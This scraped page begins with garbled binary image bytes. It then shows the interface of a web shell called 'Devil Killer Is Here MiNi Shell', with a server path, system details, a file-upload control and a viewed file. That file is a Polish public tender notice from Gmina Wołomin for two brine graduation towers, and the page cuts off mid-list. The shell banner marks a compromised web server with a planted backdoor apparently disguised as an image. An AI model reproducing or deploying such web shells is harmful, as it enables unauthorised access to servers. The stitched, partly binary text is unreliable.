JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210720/0012022701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00120227 z dnia 2021-07-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie w formule zaprojektuj i wybuduj tężni solankowej w Gminie Wołomin <br/>Część 1: Tężnia solankowa w Parku Wodiczki przy ul. Moniuszki, Część 2: Tężnia solankowa na Sławku przy ul. Tęczowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wołomin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ogrodowa 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołomin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wolomin.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wolomin.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie w formule zaprojektuj i wybuduj tężni solankowej w Gminie Wołomin <br/>Część 1: Tężnia solankowa w Parku Wodiczki przy ul. Moniuszki, Część 2: Tężnia solankowa na Sławku przy ul. Tęczowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0a108963-e930-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00120227</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005329/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa tężni solankowej cz 1: Teżnia solankowa w trosce o zdrowie mieszkańców Wołomina</p> <p class="mb-0">1.1.5 Budowa tężni solankowej cz.2 - Zawsze dla "Sławka" - zdrowo i kolorowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wolomin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">za pomocą platformy https://platformazakupowa.pl/pn/wolomin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zapisy dotyczące wymagań technicznych i organizacyjnych zawarte zostały w pkt XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące RODO zawarte są w pkt II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dotyczące RODO zawarte są w pkt II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.27.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1. Wykonanie w formule zaprojektuj i wybuduj tężni solankowej w Gminie Wołomin, to jest w Parku Wodiczki w Wołominie, przy ul. Moniuszki, w ramach zadania inwestycyjnego pn. „Tężnia solankowa w trosce o zdrowie mieszkańców Wołomina”<br/>1.Wykonać kompletną dokumentację projektową tężni na podstawie dołączonego PFU. W ramach projektu, Wykonawca zobowiązany jest:<br/>1.1 przygotować koncepcję tężni,<br/>1.2 uzyskać akceptację Zamawiającego w zakresie przedstawionej koncepcji.<br/>1.3 Zakres objęty dokumentacją:<br/>a) koncepcja winna być przedstawiona na mapie ewidencyjnej z wyraźnym oznaczeniem działek, na których zlokalizowana będzie inwestycja, opracowana w 2 egz. w wersji papierowej,<br/>b) mapa do celów projektowych – opracowana w ilości niezbędnej dla opracowania przedmiotu zamówienia + 1 egz. w wersji elektronicznej w formacie PDF,<br/>c) komplet materiałów do wystąpienia o warunki techniczne dla potrzeb budowy oraz przebudowy niezbędnej infrastruktury technicznej;<br/>d) dokumentacja geotechniczna z rozpoznaniem warunków gruntowo-wodnych,<br/>e) projekt budowlany wszystkich branż, winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord i w programie AutoCad lub innym projektowym,<br/>f) projekt wykonawczy usunięcia ewentualnych kolizji z uzbrojeniem inżynieryjnym i zagospodarowaniem terenu winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord i w programie AutoCad lub innym projektowym,<br/>g) projekt i inwentaryzacja zieleni w zakresie opracowania z wykazem nasadzeń do usunięcia winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord,<br/>h) projekt organizacji ruchu na czas budowy w 4 egz. + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>i) szczegółowa specyfikacja techniczna wykonania i odbioru robót wszystkich branż winna być opracowana w 1 egz. + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>j) informacja dotycząca bezpieczeństwa i ochrony zdrowia, którą należy uwzględnić w planie bezpieczeństwa i ochrony zdrowia, wersja papierowa w zależności od ilości egzemplarzy projektu budowlanego + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>k) inne niewymienione wyżej projekty, opracowania, materiały, które są niezbędne do uzyskania przez Zamawiającego decyzji pozwolenia na budowę / zgłoszenia robót.<br/>l) uzyskanie w imieniu Zamawiającego decyzji pozwolenia na budowę / skutecznego zgłoszenia robót.<br/>1.4 Obowiązki Wykonawcy:<br/>a) opracowanie przedmiotu zamówienia w oparciu o szczegółową wizję i pomiary w terenie,<br/>b) w przypadku wystąpienia stałych punktów geodezyjnych zaprojektować ich przestawienie w miejsce nie kolidujące z inwestycją,<br/>c) ustalenie i uzgodnienie z Zamawiającym szczegółów w zakresie rozwiązań projektowych, zastosowanych materiałów i urządzeń, których propozycję Wykonawca przedstawi do akceptacji Zamawiającemu,<br/>d) dokonanie wszelkich niezbędnych uzgodnień w tym m.in. z: zarządcą drogi, właścicielami prywatnymi w przypadku ingerencji w działki stanowiące własność osób prywatnych wraz z uzyskaniem pisemnej zgody tych osób,<br/>e) uczestniczenie w spotkaniach roboczych w trakcie opracowywania dokumentacji,<br/>f) wykonanie wszelkich dodatkowych opracowań niezbędnych do wykonania przedmiotowej dokumentacji projektowej,<br/>g) uzyskanie wymaganych prawem pozwoleń, decyzji, opinii, uzgodnień, w tym również uzgodnień międzybranżowych i innych dokumentów niezbędnych do uzyskania przez Zamawiającego decyzji pozwolenia na budowę / zgłoszenia robót,<br/>h) złożenie wraz z dokumentacją protokołu zdawczo – odbiorczego z wykazem opracowań oraz pisemnym oświadczeniem, że dostarczona dokumentacja jest wykonana zgodnie z umową, ofertą, zakresem ustalonym z Zamawiającym, obowiązującymi przepisami techniczno-budowlanymi, zasadami wiedzy technicznej oraz normami, oraz że zostaje wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,<br/>i) Wykonawca we własnym zakresie i na własny koszt uzyska wszelkie niezbędne materiały do wykonania zamówienia,<br/>j) zgłaszane przez Zamawiającego uzupełnienia, korekty i wyjaśnienia dotyczące dokumentacji projektowej, będącej przedmiotem zamówienia, Wykonawca wykona nieodpłatnie w ramach niniejszego zamówienia,<br/>k) jeżeli nastąpi konieczność wykonania opracowań dodatkowych, które będą następstwem wad dokumentacji, błędów lub zaniedbań wykonawcy, opracowania takie zostaną wykonane przez Wykonawcę bez dodatkowego wynagrodzenia,<br/>l) naniesienie zmian w dokumentacji, wymaganych przez organy administracji w toku postępowania o uzyskanie decyzji pozwolenia na budowę / zgłoszenia robót,<br/>m) zakres obowiązków Wykonawcy (Projektanta) określony został w ustawie z dnia 7 lipca 1994 r. Prawo Budowlane,<br/>1.5 Dokumentacja projektowa winna spełniać następujące wymagania:<br/>a) dokumentacja projektowa winna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,<br/>b) dokumentacja projektowa stanowić będzie podstawę do realizacji przedmiotu zamówienia - pełnego zakresu robót budowlanych na jej podstawie,<br/>c) sprawdzenie dokumentacji w zakresie wynikającym z przepisów,<br/>d) dokumentacja projektowa nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfikacją przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy „lub równoważne” lub inne równoważne wyrazy,<br/>e) dokumentacja projektowa powinna opisywać przedmiot zamówienia w tym zastosowane materiały i urządzenia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: europejskie aprobaty techniczne, wspólne specyfikacje techniczne,<br/>f) w dokumentacji będą wskazane wyroby budowlane (materiały, urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku,<br/>g) wersję elektroniczną dokumentacji projektowej należy przekazać na opisanych płytach CD. Dokumentacja elektroniczna projektów winna być odzwierciedleniem (skan) dokumentacji projektowej w formie papierowej,<br/>h) dokumentacja projektowa winna być trwale i czytelnie oznaczona (egzemplarze, tomy), oraz trwale oprawiona,<br/>i) dokumentację projektową należy opracować zgodnie z: postanowieniami zawartymi w umowie, zasadami współczesnej wiedzy technicznej, należytą starannością przy zastosowaniu obowiązujących przepisów, norm i warunków technicznych z uwzględnieniem potrzeb i specyfiki przedmiotowego zlecenia,<br/>j) dokumentacja projektowa winna być zgodna z obowiązującymi przepisami.<br/>1.6. Uzyskać wymagane prawem warunki, zezwolenia, pozwolenia, uzgodnienia, zgłoszenia robót, nie wymagające uzyskania decyzji pozwolenia na budowę;<br/>1.7. Dostarczyć i zamontować zgodnie z wykonanym i zatwierdzonym projektem tężnię wraz z niezbędnym osprzętem, infrastrukturą techniczną i zagospodarowaniem terenu.<br/>1.8 Wykonać dokumentację powykonawczą. dostarczyć karty techniczne, certyfikaty, itp. w 2 egzemplarzach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212100-7 - Roboty budowlane w zakresie obiektów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 p.z.p. polegajacych na powtórzeniu podobnych robót i dostaw w zakresie robót i dostaw w tym :<br/>-- dostawa i montaż urządzeń tężni <br/>Zamówienie udzielone będzie na warunkach określonych w projektowanych postanowieniach umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie wybrana oferta z największą<br/>łączną liczbą punktów. Sposób obliczania punktacji: Po = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Wykonanie w formule zaprojektuj i wybuduj tężni solankowej w Gminie Wołomin, to jest przy ul. Tęczowej, w ramach zadania inwestycyjnego pn. „Zawsze dla Sławka – zdrowo i kolorowo”.<br/>2. Wykonać kompletną dokumentację projektową tężni na podstawie dołączonego PFU. W ramach projektu, Wykonawca zobowiązany jest:<br/>2.1 przygotować koncepcję tężni,<br/>2..2 uzyskać akceptację Zamawiającego w zakresie przedstawionej koncepcji.<br/>2.3 Zakres objęty dokumentacją:<br/>a) koncepcja winna być przedstawiona na mapie ewidencyjnej z wyraźnym oznaczeniem działek, na których zlokalizowana będzie inwestycja, opracowana w 2 egz. w wersji papierowej,<br/>b) mapa do celów projektowych – opracowana w ilości niezbędnej dla opracowania przedmiotu zamówienia + 1 egz. w wersji elektronicznej w formacie PDF,<br/>c) komplet materiałów do wystąpienia o warunki techniczne dla potrzeb budowy oraz przebudowy niezbędnej infrastruktury technicznej;<br/>d) dokumentacja geotechniczna z rozpoznaniem warunków gruntowo-wodnych,<br/>e) projekt budowlany wszystkich branż, winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord i w programie AutoCad lub innym projektowym,<br/>f) projekt wykonawczy usunięcia ewentualnych kolizji z uzbrojeniem inżynieryjnym i zagospodarowaniem terenu winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord i w programie AutoCad lub innym projektowym,<br/>g) projekt i inwentaryzacja zieleni w zakresie opracowania z wykazem nasadzeń do usunięcia winien być opracowany w 5 egz. + 1 egz. w formie elektronicznej w formacie PDF, MsWord,<br/>h) projekt organizacji ruchu na czas budowy w 4 egz. + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>i) szczegółowa specyfikacja techniczna wykonania i odbioru robót wszystkich branż winna być opracowana w 1 egz. + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>j) informacja dotycząca bezpieczeństwa i ochrony zdrowia, którą należy uwzględnić w planie bezpieczeństwa i ochrony zdrowia, wersja papierowa w zależności od ilości egzemplarzy projektu budowlanego + 1 egz. w formie elektronicznej w formacie PDF i MsWord,<br/>k) inne niewymienione wyżej projekty, opracowania, materiały, które są niezbędne do uzyskania przez Zamawiającego decyzji pozwolenia na budowę / zgłoszenia robót.<br/>l) uzyskanie w imieniu Zamawiającego decyzji pozwolenia na budowę / skutecznego zgłoszenia robót.<br/>2.4 Obowiązki Wykonawcy:<br/>a) opracowanie przedmiotu zamówienia w oparciu o szczegółową wizję i pomiary w terenie,<br/>b) w przypadku wystąpienia stałych punktów geodezyjnych zaprojektować ich przestawienie w miejsce nie kolidujące z inwestycją,<br/>c) ustalenie i uzgodnienie z Zamawiającym szczegółów w zakresie rozwiązań projektowych, zastosowanych materiałów i urządzeń, których propozycję Wykonawca przedstawi do akceptacji Zamawiającemu,<br/>d) dokonanie wszelkich niezbędnych uzgodnień w tym m.in. z: zarządcą drogi, właścicielami prywatnymi w przypadku ingerencji w działki stanowiące własność osób prywatnych wraz z uzyskaniem pisemnej zgody tych osób,<br/>e) uczestniczenie w spotkaniach roboczych w trakcie opracowywania dokumentacji,<br/>f) wykonanie wszelkich dodatkowych opracowań niezbędnych do wykonania przedmiotowej dokumentacji projektowej,<br/>g) uzyskanie wymaganych prawem pozwoleń, decyzji, opinii, uzgodnień, w tym również uzgodnień międzybranżowych i innych dokumentów niezbędnych do uzyskania przez Zamawiającego decyzji pozwolenia na budowę / zgłoszenia robót,<br/>h) złożenie wraz z dokumentacją protokołu zdawczo – odbiorczego z wykazem opracowań oraz pisemnym oświadczeniem, że dostarczona dokumentacja jest wykonana zgodnie z umową, ofertą, zakresem ustalonym z Zamawiającym, obowiązującymi przepisami techniczno-budowlanymi, zasadami wiedzy technicznej oraz normami, oraz że zostaje wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,<br/>i) Wykonawca we własnym zakresie i na własny koszt uzyska wszelkie niezbędne materiały do wykonania zamówienia,<br/>j) zgłaszane przez Zamawiającego uzupełnienia, korekty i wyjaśnienia dotyczące dokumentacji projektowej, będącej przedmiotem zamówienia, Wykonawca wykona nieodpłatnie w ramach niniejszego zamówienia,<br/>k) jeżeli nastąpi konieczność wykonania opracowań dodatkowych, które będą następstwem wad dokumentacji, błędów lub zaniedbań wykonawcy, opracowania takie zostaną wykonane przez Wykonawcę bez dodatkowego wynagrodzenia,<br/>l) naniesienie zmian w dokumentacji, wymaganych przez organy administracji w toku postępowania o uzyskanie decyzji pozwolenia na budowę / zgłoszenia robót,<br/>m) zakres obowiązków Wykonawcy (Projektanta) określony został w ustawie z dnia 7 lipca 1994 r. Prawo Budowlane,<br/>2.5 Dokumentacja projektowa winna spełniać następujące wymagania:<br/>a) dokumentacja projektowa winna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,<br/>b) dokumentacja projektowa stanowić będzie podstawę do realizacji przedmiotu zamówienia - pełnego zakresu robót budowlanych na jej podstawie,<br/>c) sprawdzenie dokumentacji w zakresie wynikającym z przepisów,<br/>d) dokumentacja projektowa nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfikacją przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy „lub równoważne” lub inne równoważne wyrazy,<br/>e) dokumentacja projektowa powinna opisywać przedmiot zamówienia w tym zastosowane materiały i urządzenia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: europejskie aprobaty techniczne, wspólne specyfikacje techniczne,<br/>f) w dokumentacji będą wskazane wyroby budowlane (materiały, urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku,<br/>g) wersję elektroniczną dokumentacji projektowej należy przekazać na opisanych płytach CD. Dokumentacja elektroniczna projektów winna być odzwierciedleniem (skan) dokumentacji projektowej w formie papierowej,<br/>h) dokumentacja projektowa winna być trwale i czytelnie oznaczona (egzemplarze, tomy), oraz trwale oprawiona,<br/>i) dokumentację projektową należy opracować zgodnie z: postanowieniami zawartymi w umowie, zasadami współczesnej wiedzy technicznej, należytą starannością przy zastosowaniu obowiązujących przepisów, norm i warunków technicznych z uwzględnieniem potrzeb i specyfiki przedmiotowego zlecenia,<br/>j) dokumentacja projektowa winna być zgodna z obowiązującymi przepisami.<br/>2.6. Uzyskać wymagane prawem warunki, zezwolenia, pozwolenia, uzgodnienia, zgłoszenia robót, nie wymagające uzyskania decyzji pozwolenia na budowę;<br/>2.7. Dostarczyć i zamontować zgodnie z wykonanym i zatwierdzonym projektem tężnię wraz z niezbędnym osprzętem, infrastrukturą 